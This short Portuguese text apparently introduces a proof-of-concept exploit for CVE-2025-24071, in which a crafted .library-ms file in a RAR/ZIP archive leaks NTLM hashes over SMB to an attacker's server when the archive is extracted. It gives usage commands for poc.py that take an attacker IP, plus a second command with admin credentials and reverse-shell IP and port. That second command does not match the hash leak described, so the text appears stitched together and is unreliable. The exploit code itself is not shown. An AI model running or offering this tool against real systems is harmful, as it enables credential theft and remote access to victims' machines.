
Exploit de prova de conceito para CVE-2025-24071 (vazamento de hash NTLM via extração de arquivo .library-ms de arquivos RAR/ZIP). Dispara autenticação SMB na extração, revelando hashes NTLM para servidor controlado pelo atacante.
CVE-2025-24071: Vazamento de Hash NTLM via Extração de RAR/ZIP e Arquivo .library-ms
>>python poc.py
>>enter file name: your file name
>>enter IP: attacker IP
>>python3 poc.py --url http://domainname.com --user admin --password password --reverse-ip 10.10.10.10 --reverse-port 8888